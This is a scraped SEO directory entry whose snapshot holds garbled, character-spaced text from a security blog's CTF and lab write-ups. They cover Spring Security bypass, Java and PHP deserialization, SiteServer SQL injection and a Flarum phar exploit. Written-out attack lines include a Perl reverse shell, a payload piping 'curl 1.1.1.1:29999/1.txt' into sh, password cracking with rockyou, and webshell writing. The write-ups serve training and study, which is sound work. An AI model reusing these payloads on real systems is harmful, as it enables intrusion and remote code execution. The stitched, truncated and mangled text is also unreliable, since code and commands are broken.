Heat: 2
Serial number: 8222
Classification: Movie video
Joined: 2025-01-14 03:02:12
Last click: 2025-05-14 23:34:16
Registration: -
Name: -
SEO update time: 2025-05-14T23:34:19
Website tags: the site has not set up keywords
Website description: Justanovice
Previous article: Beijing office buildings, office buildings rental and rental prices, Beijing joint office, shared office information - Beijing 58 joint office network
Next article: This website cannot be accessed

SEO comprehensive information
SEO information: Baidu visit IP: - | Mobile visit IP: - | Outbound links: 0 | Site links: 0
IP and speed: IP address: - | Location: - | Response time: 838 milliseconds
ALEXA ranking: World ranking: - | Estimated IP: - | Estimated PV: -
Registration information: - | Name: - | Created: Unknown
Included: Baidu 0 | 360 0 | Sogou 0 | Query 0
Keywords: Computer keywords 0 | Mobile phone keywords 0 | Page friendly: Excellent | Home page location: computer - | Index: 0 | Recent collection: 0
Server information: Protocol type: HTTP/1.1 200 OK | Page type: text/html | Server type: nginx | Program support: - | Connection ID: W/"654afeae-8caf" | Message sending: 2024 August 11, 2017 | GZIP test: GZIP compression enabled | Source file size: 33.16KB | Compressed size: 13.68KB | Compression rate: 58.75%
Website snapshotL x x x L x x x L x x x L x x x J u s t a n o v i c e 2 0 2 3 Zhejiang University Student Provincial Competition Preliminary Competition s e c O b j L x x x p u b l i s h e d o n 2 0 2 3 1 1 0 8 Question Information This question involves knowledge points: J a v a Code audit, S p r i n g S e c u r i t y Permission verification bypass, H o t S w a p p a b l e T a r g e t S o u r c e Bypass the blacklist, S i g n e d O b j e c t Secondary deserialization question type: C T F Title: 2 0 2 3 Zhejiang University Student Provincial Competition Preliminary Competition s e c O b j Title mirror: c c r . c c s . t e n c e n t y u n . c o m / l x x x i n / p u b l i c : z j c t f 2 0 2 3 _ s e c o b j Internal port: 8 0 Question attachment: 6 Z O + 5 o 6 l O i B o d H R w c z o v L 3 B h b i 5 i Y W l k d S 5 j b 2 0 v c y 8 x T l B B U l h L L W N r W G N T Q U 9 Q V H l y b G x L U T 9 w d 2 Q 9 Z m x h Z y D m j 5 D l j 5 b n o I E 6 I G Z s Y W c = ( Do it yourself B a s e 6 4 Decode) Please make sure to install the script locally d o c k e r Command, and make sure that port 1 2 3 4 5 is not occupied, then r o o t Permission to run the following command. After successful execution, a string of 1 hexadecimal string will be returned (this is a container I D ) , Indicates that the container runs successfully, then open it C h r o m e or F i r e f o x Browser, use the browser to access 1 2 3 4 5 port 1 d o c k e r r u n i t d p 1 2 3 4 5 : 8 0 e F L A G = f l a g c c r . c c s . t e n c e n t y u n . 
c o m / l x x x i n / p u b l i c : z j c t f 2 0 2 3 _ s e c o b j W r i t e U p S p r i n g S e c u r i t y The permission bypass analysis question is given to the attachment, decompile and open, the overall directory structure is as follows: S p r i n g S e c u r i t y Permission verification exists A d m i n C o n t r o l l e r and I n d e x C o n t r o l l e r Customized one O b j e c t I n p u t S t r e a m See first p o m rely, p o m Dependency is quite normal, there are no very special dependencies: Let's see A d m i n C o n t r o l l e r , It is obvious that there is a deserialization portal in / a d m i n Under route, since it is used here S p r i n g S e c u r i t y Do permission verification, so you need to try to bypass permission verification observation S e c u r i t y C o n f i g Category: First c o n f i g u r e The second access control was done c o n f i g u r e Set up a d m i n Password, however a d m i n The password is u u i d The randomly generated access control chain here is as follows: 1 ( ( H t t p S e c u r i t y ) ( ( F o r m L o g i n C o n f i g u r e r ) ( ( H t t p S e c u r i t y ) ( ( E x p r e s s i o n U r l A u t h o r i z a t i o n C o n f i g u r e r . A u t h o r i z e d U r l ) ( ( E x p r e s s i o n U r l A u t h o r i z a t i o n C o n f i g u r e r . A u t h o r i z e d U r l ) h t t p . a u t h o r i z e R e q u e s t s ( ) . a n t M a t c h e r s ( n e w S t r i n g [ ] ) ) . h a s R o l e ( A D M I N ) . a n y R e q u e s t ( ) ) . p e r m i t A l l ( ) . a n d ( ) ) . f o r m L o g i n ( ) . d e f a u l t S u c c e s s U r l ( / a d m i n / u s e r / h e l l o ) ) . a n d ( ) ) . l o g o u t ( ) . l o g o u t S u c c e s s U r l ( / l o g i n ) ; Due to the type conversion in decompilation, the original chain access control is very ugly to compile. 
Here is a little beautification: The original intention is to have it A D M I N People of the role can access it / a d m i n / * The default login route for successful resource under / a d m i n / u s e r / h e l l o Jump to log out / l o g i n 1 2 3 4 5 6 h t t p . a u t h o r i z e R e q u e s t s ( ) . a n t M a t c h e r s ( n e w S t r i n g [ ] ) . h a s R o l e ( A D M I N ) . a n y R e q u e s t ( ) . p e r m i t A l l ( ) . a n d ( ) . f o r m L o g i n ( ) . d e f a u l t S u c c e s s U r l ( / a d m i n / u s e r / h e l l o ) ) . a n d ( ) . l o g o u t ( ) . l o g o u t S u c c e s s U r l ( / l o g i n ) ; There is actually bypass here: / a d m i n / * In fact, only one layer of resources is matched, for example: / a d m i n / a , Can match / a d m i n / a . j s , But it cannot match / a d m i n / a / b If you want a match / a d m i n / a / b , It needs to be written / a d m i n / * * The deserialization portal here is located in / a d m i n / u s e r / r e a d O b j , But used / a d m i n / * To match, obviously, it is not matched here bypass and S p r i n g S e c u r i t y No matter, this matching pattern is designed like this. If encountered in a production environment, it is a problem for developers. 
Therefore, no parameters are added or no S E S S I O N In the case of / a d m i n / u s e r / h e l l o So the question is, why is it directly P O S T Go to visit / a d m i n / u s e r / r e a d O b j But it can't do it?It should be noted that the return here is 4 0 3 F o r b i d d e n , Not 4 0 1 U n a u t h o r i z e d , So the permission judgment has actually been passed, and the reason for returning 4 0 3 is actually S p r i n g S e c u r i t y It will be enabled by default c s r f Verify, prevent c s r f Attack, in fact, during development, many training videos will be put into S p r i n g S e c u r i t y of c s r f Verification is turned off (as shown in the following code): R e a d M o r e Spring and Autumn Cloud Mirror T u n n e l X L x x x p u b l i s h e d o n 2 0 2 3 1 0 3 1 Collect and call information on the Internet S i t e S e r v e r v 1 6 . 5 Database external network information collection: Port 80 has one S i t e S e r v e r C M S Version is v 1 6 . 5 2 1 2 1 There is an anonymous login on the port F T P Service, F T P There is a service s e c r e t . 7 z download s e c r e t . 7 z ( here M a c Can't download it, use it L i n u x of f t p Can be downloaded) 1 2 3 4 f t p 3 9 . 9 9 . 2 3 8 . 6 9 2 1 2 1 a n o n y m o u s d i r g e t s e c r e t . 7 z After downloading, s e c r e t . 7 z Open the password required, first convert it to j o h n Format, then use j o h n Go to blast the password (completely run here j o h n It takes 4 8 hours, but the password is relatively high, and it can run out in about 1 minute) The password is 1 3 1 3 1 3 1 3 1 3 3, please be careful to use 7 z Command to unzip, M a c Unzip the password and enter it will fail 1 2 3 7 z 2 j o h n s e c r e t . 7 z > 1 . t x t j o h n 1 . t x t w o r d l i s t = / u s r / s h a r e / w o r d l i s t s / r o c k y o u . t x t 7 z x s e c r e t . 7 z After decompression, there is one s e c r e t . 
t x t , Give one u u i d , This is S i t e S e r v e r C M S of A P I Key 1 7 z x s e c r e t . 7 z 8 0 There is a port S i t e S e r v e r v 1 6 . 5 Service, this version has a background S Q L injection: h t t p s : / / g i t h u b . c o m / s i t e s e r v e r / c m s / i s s u e s / 3 2 3 7 S i t e S e r v e r C M S Provided for use H e a d e r of A P I Authentication method replaces account password login, so we have A P I After that, you can directly call the background interface and then cause S Q L injection h t t p s : / / s s c m s . c o m / d o c s / v 6 / a p i / g u i d e / a u t h e n t i c a t i o n . h t m l # % E 4 % B D % B F % E 7 % 9 4 % A 8 a p i % E 5 % A F % 8 6 % E 9 % 9 2 % A 5 % E 8 % B F % 9 B % E 8 % A 1 % 8 C % E 8 % B A % A B % E 4 % B B % B D % E 8 % A E % A 4 % E 8 % A F % 8 1 A streamlined backend S Q L The injection request packet is as follows, and the following contents are expanded from this data packet: 1 2 3 4 5 6 7 P O S T / a p i / p a g e s / c m s / l i b r a r y T e x t / l i s t H T T P / 1 . 1 H o s t : 3 9 . 9 9 . 2 3 8 . 2 0 9 X S S A P I K E Y : e 7 d 4 1 8 9 0 5 7 4 2 4 8 f 0 9 f 3 c 1 3 9 3 d b 5 4 1 f c 7 C o n t e n t T y p e : a p p l i c a t i o n / j s o n C o n t e n t L e n g t h : 1 2 7 use D N S Tunnel rebound s h e l l and the agent have been tested, here W e b Services and M y S Q L The database is separate, and M y S Q L Database T C P It's not out of the Internet, but D N S Outbound (can be used c u r l Take-out part command result), so we need to build D N S Tunnel (not T C P Tunnel) At this time we can only execute S Q L Statement, if you want to execute commands, you can use loading u d f . s o Execute the command in the way, due to loading u d f . 
s o The data packet is relatively large, so I will not post it in the article here, the script has been placed G i t h u b superior: R e a d M o r e Spring and Autumn Cloud Mirror F l a r u m L x x x p u b l i s h e d o n 2 0 2 3 0 8 1 5 External network F l a r u m “ Weak" password backend P h a r Click to open a login box, and it was stuck for 3 hours. According to the homepage prompt, the user name is a d m i n i s t r a t o r , The email address is a d m i n i s t r a t o r @ x i a o r a n g . l a b Here is the password, r o c k y o u . t x t Run the password a d m i n i s t r a t o r 、 1 c h r i s Enter the background, here the external network uses F l a r u m Frame, this frame last year P Niu posted an article, it is a backstage R C E Hole: h t t p s : / / m p . w e i x i n . q q . c o m / s / E q E y E D K p z x S 5 B Y A _ t 7 4 p 9 A Function points are being edited C S S The principle of processing is simply to use l e s s . p h p Compilation L e s s , During the compilation process, use @ i m p o r t ( i n l i n e ) and d a t a Pseudo-protocol writes files to a s s e t s / f o r u m . c s s In, use again d a t a u r i ( p h a r : / / . / a s s e t s / f o r u m . c s s ) trigger p h a r The deserialization implementation command executes the deserialization chain here by p h p g g c Generate: Bounce here s h e l l Need a little trick, my way of playing here is: on port 2 9 9 9 9 H T T P Put one in the service. t x t , Then listen on port 3 9 9 9 9 ready to get s h e l l 1 p e r l e u s e S o c k e t ; $ i = 1 . 1 . 1 . 1 ; $ p = 3 9 9 9 9 ; s o c k e t ( S , P F _ I N E T , S O C K _ S T R E A M , g e t p r o t o b y n a m e ( t c p ) ) ; i f ( c o n n e c t ( S , s o c k a d d r _ i n ( $ p , i n e t _ a t o n ( $ i ) ) ) ) ; Use again p h p g g c Generate 1 p h p p h p g g c p t a r b M o n o l o g / R C E 6 s y s t e m c u r l 1 . 1 . 1 . 1 : 2 9 9 9 9 / 1 . 
t x t | s h p a y l o a d As follows: 1 @ i m p o r t ( i n l i n e ) d a t a : t e x t / c s s ; b a s e 6 4 , d G V z d C 5 0 e H Q A A A A A A A . . . . . . ; Visit, p h a r The content is successfully written and edited, using d a t a u r i Do p h a r Deserialization trigger command execution 1 2 3. t e s t take s h e l l The next part is the raising of power, this question is useless s u i d raising rights, use c a p a b i l i t i e s Elevate permission, search and set c a p a b i l i t i e s Executable file 1 g e t c a p r / 2 > / d e v / n u l l Discover o p e n s s l Can be used: o p e n s s l Generate certificate start w e b Service listening on 8 0 8 0 port 1 2 o p e n s s l r e q x 5 0 9 n e w k e y r s a : 2 0 4 8 k e y o u t / t m p / k e y . p e m o u t / t m p / c e r t . p e m d a y s 3 6 5 n o d e s o p e n s s l s _ s e r v e r k e y / t m p / k e y . R e a d M o r e 2 0 2 3 N e p C T F E z _ i n c l u d e L x x x p u b l i s h e d o n 2 0 2 3 0 8 1 5 This question will not be mirrored, it is too confusing, and various knowledge points are mixed together. I look forward to it N e p Public mirror (Question information title: 2 0 2 3 N e p C T F E z _ i n c l u d e Title description: A p a c h e 2 It will automatically restart every five minutes, which will not affect the process of solving the questions and deploy the questions for a while. Please wait patiently (if it is still inaccessible after more than 10 minutes, please destroy the container and restart it). You can refer to: h t t p s : / / t t t a n g . 
c o m / a r c h i v e / 1 3 9 5 / W r i t e U p This question refers to the solutions of other masters, and is currently bypassing d i s a b l e _ f u n c t i o n s Some of them saw two ways of playing, respectively, using G C O N V and L D _ P R E L O A D Environment variables d i s a b l e _ f u n c t i o n s The general idea of this question is as follows: P H P of f i l t e r Pseudo-protocol completed L F I arrive R C E use D O M D o c u m e n t Native class write file bypass d i s a b l e _ f u n c t i o n s Elevate the power of environmental variables f l a g G C O N V First, open the topic, click the home page button, there is a l i n k Parameters, the file contains a splicing of the backend, and then pass it in / t m p / r e s o u r c e s / 4 Will become / t m p / r e s o u r c e s / 4 . t x t use p h p _ f i l t e r _ c h a i n _ g e n e r a t o r Generate a paragraph L F I 2 R C E The mysterious string (the specific principle is not explained here, simply put it simply to use it B a s e 6 4 and U T F 8 change U T F 7 Patch together a piece of features w e b s h e l l , Including w e b s h e l l Implement command execution) h t t p s : / / g i t h u b . c o m / s y n a c k t i v / p h p _ f i l t e r _ c h a i n _ g e n e r a t o r 1 p y t h o n 3 p h p _ f i l t e r _ c h a i n _ g e n e r a t o r . 
p y c h a i n Then pass the string generated above to l i n k Parameters, the password of the Trojan is 1 in one sentence, just execute the command, please note that there is d i s a b l e _ f u n c t i o n s , So execute first p h p i n f o Check d i s a b l e _ f u n c t i o n s and d i s a b l e _ c l a s s e s What are there d i s a b l e _ f u n c t i o n s and d i s a b l e _ c l a s s e s The contents are as follows 1 2 f p a s s t h r u , f g e t s s , f g e t s , f o p e n , f r e a d , s h o w _ s o u c e , s t r e a m _ s o c k e t _ c l i e n t , f s o c k o p e n , p c n t l _ a l a r m , p c n t l _ f o r k , p c n t l _ w a i t p i d , p c n t l _ w a i t , p c n t l _ w i f e x i t e d , p c n t l _ w i f s t o p p e d , p c n t l _ w i f s i g n a l e d , p c n t l _ w i f c o n t i n u e d , p c n t l _ w e x i t s t a t u s , p c n t l _ w t e r m s i g , p c n t l _ w s t o p s i g , p c n t l _ s i g n a l , p c n t l _ s i g n a l _ g e t _ h a n d l e r , p c n t l _ s i g n a l _ d i s p a t c h , p c n t l _ g e t _ l a s t _ e r r o r , p c n t l _ s t r e r r o r , p c n t l _ s i g p r o c m a s k , p c n t l _ s i g w a i t i n f o , p c n t l _ s i g t i m e d w a i t , p c n t l _ e x e c , p c n t l _ g e t p r i o r i t y , p c n t l _ s e t p r i o r i t y , p c n t l _ a s y n c _ s i g n a l s , s y s t e m , e x e c , s h e l l _ e x e c , p o p e n , p r o c _ o p e n , p a s s t h r u , s y m l i n k , l i n k , s y s l o g , i m a p _ o p e n , d l , m a i l , e r r o r _ l o g , d e b u g _ b a c k t r a c e , d e b u g _ p r i n t _ b a c k t r a c e , g c _ c o l l e c t _ c y c l e s , a r r a y _ m e r g e _ r e c u r s i v e , p f s o c k o p e n , r e a d f i l e , f i l e _ g e t _ c o n t e n t s , f i l e _ p u t _ c o n t e n t s , f p u t s , f w r i t e , d e l e t e , r m d i r , r e n a m e , c h g r p , c h m o d , c h o w n , c o p y , c h d i r , m k d i r , f i l e , c h r o o t , a s s e r t , d l , m o v 
e _ u p l o a d _ f i l e , s y s m l i n k , r e a d l i n k , c u r l _ i n i t , c u r l _ e x e c E x c e p t i o n , S p l D o u b l y L i n k e d L i s t , E r r o r , E r r o r E x c e p t i o n , A r g u m e n t C o u n t E r r o r , A r i t h m e t i c E r r o r , A s s e r t i o n E r r o r , D i v i s i o n B y Z e r o E r r o r , C o m p i l e E r r o r , P a r s e E r r o r , T y p e E r r o r , V a l u e E r r o r , U n h a n d l e d M a t c h E r r o r , C l o s e d G e n e r a t o r E x c e p t i o n , L o g i c E x c e p t i o n , B a d F u n c t i o n C a l l E x c e p t i o n , B a d M e t h o d C a l l E x c e p t i o n , D o m a i n E x c e p t i o n , I n v a l i d A r g u m e n t E x c e p t i o n , L e n g t h E x c e p t i o n , O u t O f R a n g e E x c e p t i o n , P h a r E x c e p t i o n , R e f l e c t i o n E x c e p t i o n , R u n t i m e E x c e p t i o n , O u t O f B o u n d s E x c e p t i o n , O v e r f l o w E x c e p t i o n , P D O E x c e p t i o n , R a n g e E x c e p t i o n , U n d e r f l o w E x c e p t i o n , U n e x p e c t e d V a l u e E x c e p t i o n , J s o n E x c e p t i o n , S p l F i l e O b j e c t , S o d i u m E x c e p t i o n Similarly, I also found that the problem environment was set o p e n _ b a s e d i r This part of the ant sword can be connected normally. There is a h i n t . i n i , yes p h p . i n i configuration, where / t m p The directory can be accessed in the Ant Sword. You can directly enter the path in the red box to read it. The next step is to bypass it. d i s a b l e _ f u n c t i o n s , Used here G C O N V Bypass d i s a b l e _ f u n c t i o n s , The complete method is as follows: In order to facilitate the data packets in the future, we will first use the previous horse to write them. W e b s h e l l arrive / t m p / t e s t . 
t x t , because f i l e _ p u t _ c o n t e n t s All functions are filtered, here D O M D o c u m e n t Write files in native classes (note U R L Encoding) 1 2 3 4 1 = $ f = / t m p / t e s t . t x t ; $ d = n e w D O M D o c u m e n t ( ) ; $ d l o a d H T M L ( P D 9 w a H A g a W 5 p X 3 N l d C g n Z G l z c G x h e V 9 l c n J v c n M n L C d P b i c p O 2 V 2 Y W w o J F 9 Q T 1 N U W z F d K T s % 2 F P g % 3 D % 3 D ) ; $ d s a v e H t m l F i l e ( p h p : / / f i l t e r / s t r i n g . s t r i p _ t a g s | c o n v e r t . b a s e 6 4 d e c o d e / r e s o u r c e = $ f ) ; After writing, you can check whether the file size is correct and write one more in Ant Sword. p a y l o a d . c , Compile it locally into a malicious dynamic link library, which will execute 1. s h File content (This way of playing is relatively stable, I'm here g c o n v _ i n i t ( ) Directly shot s h e l l Yes, the question is not remote, it is estimated that there are many environmental restrictions) 1 2 3 4 5 6 7 8 9 1 0 # i n c l u d e # i n c l u d e v o i d g c o n v ( ) v o i d g c o n v _ i n i t ( ) l x x x i n / c i s c n 2 0 2 3 _ d e s e r b u g W r i t e U p This question examines c c For chain transformation, download the attachment to analyze: T e s t a p p Directly passed in the class b u g s t r parameter b a s e 6 4 Decode and deserialize, and also call t o S t r i n g ( ) The method question is used C C 3 . 2 . 2 Depend on C C 3 . 2 . 2 And later, for some unsafe J a v a The serialization of the class has added a switch, which defaults to the off state, for example C C 6 To be used I n v o k e r T r a n s f o r m e r The class was killed, but the question was given M y e x c e p t Class, note g e t A n y e x c e p t Methods can instantiate a single parameter class. T r A X F i l t e r Class: Therefore s i n k Just click T e m p l a t e s I m p l Splice the middle class g a d g e t , The question gives the following tips: 1 c n . h u t o o l . j s o n . 
J S O N O b j e c t . p u t c o m . a p p . M y e x p e c t # g e t A n y e x c e p t Then the next thing is to find a call p u t Where, L a z y M a p # g e t Methods can be called p u t Then find a call g e t Where, requested to call g e t There is only one parameter, and it is M a p Class implementation class usage T a b b y The syntax of searching is as follows ( F r o m a t a o ) : m a t c h ( s o u r c e : M e t h o d ) w h e r e s o u r c e . C L A S S N A M E = ~ o r g . a p a c h e . c o m m o n s . c o l l e c t i o n s . * m a t c h ( s i n k : M e t h o d ) w h e r e s i n k . P A R A M E T E R _ S I Z E = 1 w i t h s o u r c e , c o l l e c t ( s i n k ) a s s i n k s c a l l t a b b y . a l g o . f i n d J a v a G a d g e t ( s o u r c e , s i n k s , 3 , f a l s e , t r u e ) y i e l d p a t h r e t u r n p a t h The final class found is T i e d M a p E n t r y The stack information is as follows: 1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 e x e c : 3 4 7 , R u n t i m e ( j a v a . R e a d M o r e 2 0 2 3 C I S C N Preliminary competition g o s e s s i o n L x x x p u b l i s h e d o n 2 0 2 3 0 8 1 3 Mirror information title: 2 0 2 3 C I S C N Preliminary competition g o s e s s i o n d o c k e r Mirror: l x x x i n / c i s c n 2 0 2 3 _ g o s e s s i o n f l a g Information: Internal ports in the root directory: 8 0 Note: When deploying, the container needs at least 2 5 6 M B running memory, otherwise the container will not be able to start the question description: c t f e r I wrote the code according to the template of the official documentation, but it seems something went wrong. The container may take one or two minutes to start, please be patient!appendix: g o _ s e s s i o n _ 4 c 9 1 a f 7 9 7 8 0 f c 7 0 a 4 d 2 1 b 2 7 2 b a 3 a 3 7 1 c . 
z i p Start script 1 d o c k e r r u n i t d p 1 2 3 4 5 : 8 0 e F L A G = f l a g l x x x i n / c i s c n 2 0 2 3 _ g o s e s s i o n W r i t e U p Download the attachment and put it in G o l a n d In analysis, there are three routes in the question: I n d e x A d m i n F l a s k See first I n d e x routing, I n d e x The routing content is very simple, I directly assigned a s e s s i o n , s e s s i o n In-house n a m e The value is g u e s t , Found here s e s s i o n of k e y It is through S E S S I O N _ K E Y See again when obtaining environment variables A d m i n Routing: Here s e s s i o n Verified, required n a m e for a d m i n Used here p o n g o 2 Do template rendering, there is a template rendering vulnerability, then look at it F l a s k routing: F l a s k The route will request the 5 0 0 0 port service in the target machine, and the request page is echoed and tested, and the following conclusions are drawn: The 5 0 0 port is p y t h o n of f l a s k Service, enabled d e b u g Mode, source code does not exist s s t i Vulnerability s e s s i o n default k e y It is empty, can be faked directly a d m i n user f l a s k Source code can be used to f l a s k Report an error to obtain: 1 / f l a s k ? n a m e = / The source code is as follows: The correct idea of this question is as follows: s e s s i o n default k e y Empty, forged a d m i n User can call it after A d m i n routing A d m i n Exist in the route p o n g o 2 Template injection vulnerability, p o n g o 2 Template syntax can be referenced D j a n g o Template syntax passed D j a n g o Template injection overlay / a p p / s e r v e r . 
p y File, due to p y t h o n The service can be "hot-deployed", so after overwriting the malicious file, it will be passed F l a s k Just call the route R C E Let me talk about the wrong idea: The wrong idea is to use it p o n g o 2 Template syntax reading calculation P I N The required files are calculated P I N After passing F l a s k Routing request / c o n s o l e accomplish R C E , But want to be / c o n s o l e Execute the command in the process only G E T Passing parameters cannot complete verification, and subsequent code execution requests need to be carried C o o k i e Verify, so if this road doesn't work, first get it a d m i n User's s e s s i o n : Add the following code to r o u t e In the , you can get the forged s e s s i o n 1 2 3 4 5 6 f u n c K e y ( c * g i n . C o n t e x t ) l x x x i n / s c t f 2 0 2 3 _ f u m o b a c k d o o r W r i t e U p Download attachment, audit source code, the question is not available on the Internet i m a g i c k Extended, / v a r / w w w / h t m l The directory cannot be written and re-audged source code. There are three functional points in total: Deserialization and deletion / t m p All contents in the directory (this is a tip for the question) Highlight the current file and look at the back category given by the question: Actually here s i n k There are two points, one is r e a d f i l e Read the file, the other one is n e w $ a ( $ b ) Format code for n e w $ a ( $ b ) Format code, if the question is out of the Internet and w e b If the directory is writeable, you can directly R C E , but this question is not published online. w e b The directory cannot be written, so the question s i n k Click right at r e a d f i l e Then how to trigger it _ _ s l e e p ( ) What about the magic method? _ _ s l e e p The magic method will be called during serialization, so the entire attack process is as follows: First, / t m p Directory clear: 1 2 G E T / ? c m d = r m H T T P / 1 . 1 H o s t : 1 . 1 . 1 . 
1 : 4 9 3 3 8 Make another one P P M Picture, select P P M The reason is P P M Some dirty data is allowed to be added at the end, and the dirty data will not be i m a g i c k erase s e s s i o n The content generation method is as follows: Here we set p a t h The attribute is / t m p / r e s Path, this path is / f l a g The path after copying focuses on 16 lines. The number of dirty data here actually has certain requirements. It is set on line 12. P P M The length and width of the picture, i.e. 9 * 9 Pixels, dirty data here + The number of serialized data needs to be greater than or equal to 3 * 9 * 9 and less than or equal to 4 * 9 * 9 ( Here 3 and 4 can be simply understood as the bytes occupied by each pixel). I won’t go into the details, so I will take it as a conclusion here (if you have other ideas, you can send a private message to discuss at any time) 1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 R e a d M o r e 2 0 2 3 S C T F p y p y p L x x x p u b l i s h e d o n 2 0 2 3 0 8 1 3 Question information Question name: 2 0 2 3 S C T F p y p y p ? Title mirror: l x x x i n / s c t f 2 0 2 3 _ p y p y p f l a g information: / f l a g ( need S U I D Elevate rights) Internal port: 8 0 Question description: a p i e c e o f c a k e b u t h a r d w o r k 。 p e r 5 m i n r e s t a r t . p a y a t t e n t i o n t o / a p p / a p p . p y Start script 1 d o c k e r r u n i t d p 1 2 3 4 5 : 8 0 e F L A G = f l a g l x x x i n / s c t f 2 0 2 3 _ p y p y p W r i t e U p Open the title and show no s e s s i o n Can be used S E S S I O N _ U P L O A D _ P R O G R E S S Create a s e s s i o n : The following p r o x i e s for B u r p S u i t e proxy address 1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 i m p o r t r e q u e s t s u r l = h t t p : / / 1 . 1 . 1 . 
1 : 4 9 3 4 3 / d a t a = f i l e = c o o k i e s = p r o x i e s = l x x x i n / d f j k 2 0 2 3 _ b a b y u r l W r i t e U p S i g n e d O b j e c t Secondary deserialization This method can only list the directory and read files, and can be directly read files during the game. f l a g , This image's f l a g need s u i d Only after elevating the power can you read it. If you only want to reproduce the play method, enter the container to / f l a g Assign read permissions to download attachments and decompile them. The file structure is as follows: I n d e x C o n t r o l l e r In-house / h a c k There is a deserialization entry in the route. Here, deserialization is a custom object input stream. U R L V i s i t e r and U R L H e l p e r Filtered out / f i l e The route will read / t m p / f i l e and return the content in U R L H e l p e r There is a deserialization entry in the class because U R L H e l p e r The class is filtered and cannot be deserialized directly, but it can be deserialized twice. S i g n O b j e c t # g e t O b j e c t The next problem will be converted to how to call it S i g n O b j e c t # g e t O b j e c t This test point is 2 0 2 3 Alibaba Cloud C T F of B y p a s s i t 1 Have visited 2 0 2 3 Alibaba Cloud C T F B y p a s s i t 1 Rewrite locally B a s e J s o n N o d e � Class, w r i t e R e p l a c e Delete the method to deserialize the complete one normally P o C As follows: U R L H e l p e r Will be passed in u r l Do verification, but use m y u r l . s t a r t s W i t h ( f i l e ) 1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 2 0 2 1 2 2 2 3 2 4 2 5 2 6 2 7 2 8 2 9 3 0 3 1 3 2 3 3 3 4 3 5 3 6 3 7 3 8 3 9 4 0 4 1 4 2 4 3 4 4 4 5 i m p o r t c o m . 
R e a d M o r e 2 0 2 3 Mindun Cup preliminary match b a b y j a L x x x p u b l i s h e d o n 2 0 2 3 0 8 1 3 Question information Question name: 2 0 2 3 Fujian Shield Cup preliminary competition b a b y j a d o c k e r Mirror: l x x x i n / m d b 2 0 2 3 _ b a b y j a f l a g information: / f l a g . t x t Internal port: 8 0 8 0 Attachment: Level 4. z i p Start script 1 d o c k e r r u n i t d p 1 2 3 4 5 : 8 0 8 0 e F L A G = f l a g l x x x i n / m d b 2 0 2 3 _ b a b y j a W r i t e U p Download the attachment, decompile first, look at the dependencies, use it v a a d i n 、 f a s t j s o n 、 c 3 p 0 、 m y s q l j d b c , Each component used here has a vulnerability and then look at the controller part, among which / a d m i n / The route exists J S O N Analysis, need to be passed in d a t a Parameters (parameter value requires b a s e 6 4 Encoding), here is the entry point J S O N Before parsing, it will be S e c u r i t y C h e c k Making matches in the class: Used in the question f a s t j s o n It is version 1.2.2 4 (it is considered an older version), filtered T e m p l a t e s I m p l 、 J d b c R o w S e t I m p l Commonly used s i n k But the question is also provided M y B e a n kind, M y B e a n # g e t C o n n e c t i o n will do J D B C Connected due to the problem f a s t j s o n 1 . 2 . 2 4 , Can't pass directly p a r s e Call g e t t e r Method, in f a s t j s o n 1 . 2 . 4 7 Can be passed later p a r s e Call g e t t e r Method (if you want to call the developer's custom class g e t t e r Need to be turned on A u t o T y p e S u p p o r t Options, quite useless) But I also used one v a a d i n Dependency, this dependency also has a deserialization vulnerability, which can reflect all calls to any class. 
g e t t e r Method, specific v a a d i n Deserialization process reference s u 1 8 👴 🏻 Blog: J a v a Deserialization vulnerability (V) R O M E / B e a n S h e l l / C 3 P 0 / C l o j u r e / C l i c k / V a a d i n | Su Shiba's question is still used S p r i n g S e c u r i t y right / a d m i n The route under this is used for permission verification, but the account password is hardcoded in the code, so you can log in and use it directly: Let’s sort it out, the complete attack idea is as follows: First, use the account password to log in to the background to access it / a d m i n / routing, P O S T Incoming d a t a Parameter server-side incoming d a t a parameter b a s e 6 4 Decode, and call f a s t j s o n of p a r s e Analyze the problem f a s t j s o n 1 . 2 . 2 4 Dependency, here we use f a s t j s o n 1 . 2 . 4 7 of p a y l o a d beat c 3 p 0 , generally f a s t j s o n beat c 3 p 0 All are fighting j n d i , But the question is filtered out j n d i , Call here c 3 p 0 of W r a p p e r C o n n e c t i o n P o o l D a t a S o u r c e , That is to call H E X Serialization byte loader quadratic deserialization content is v a a d i n Depend on M y B e a n # g e t C o n n e c t i o n trigger J D B C Connect to the directory and then read the complete file content E X P As follows: Although the question filters B a d A t t r i b u t e V a l u e E x p E x c e p t i o n string, but its hexadecimal value is not filtered, so it can be used B a d A t t r i b u t e V a l u e E x p E x c e p t i o n Class, title blacklist filtered 5 4 6 5 6 D 7 0 6 C 6 1 7 4 6 5 7 3 4 9 6 D 7 0 6 C yes T e m p l a t e s I m p l kind u s e r = f i l e r e a d _ f i l e : / / / . Used to list / For all files in the directory, please refer to the specific usage: h t t p s : / / g i t h u b . 
import javax.

2018-2023 | Zhejiang ICP filing no. 2021020572-1
Address of this article: https://www.wl200.cn/links/3f928e7caafd89531dae.html